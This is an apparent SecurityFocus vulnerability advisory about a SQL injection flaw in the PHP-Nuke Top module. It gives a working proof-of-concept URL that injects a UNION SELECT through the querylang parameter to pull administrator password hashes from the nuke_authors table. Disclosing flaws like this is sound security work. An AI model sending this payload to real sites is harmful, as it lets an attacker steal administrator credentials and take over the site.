Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHP-Nuke Top Module SQL Injection Vulnerability

No exploit is required.

The following proof of concept was provided:

http://www.example.com/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*







 

Privacy Statement
Copyright 2008, SecurityFocus